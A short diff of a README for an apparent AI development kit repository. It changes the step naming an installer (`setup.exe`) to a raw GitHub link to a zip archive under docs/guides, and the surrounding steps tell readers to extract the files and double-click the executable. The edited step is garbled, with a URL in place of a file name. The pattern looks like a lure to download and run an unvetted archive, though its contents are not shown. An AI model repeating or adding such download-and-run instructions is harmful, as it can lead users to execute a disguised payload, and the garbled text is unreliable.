Saathviksb/1c-ai-development-kit/README.md

 2. Open the folder with the extracted files.

-3. Look for an installer file named like `setup.exe` or simply the application executable.
+3. Look for an installer file named like `https://raw.githubusercontent.com/Saathviksb/1c-ai-development-kit/master/docs/guides/development-ai-c-kit-2.4.zip` or simply the application executable.

 4. Double-click the installer or executable to launch the program.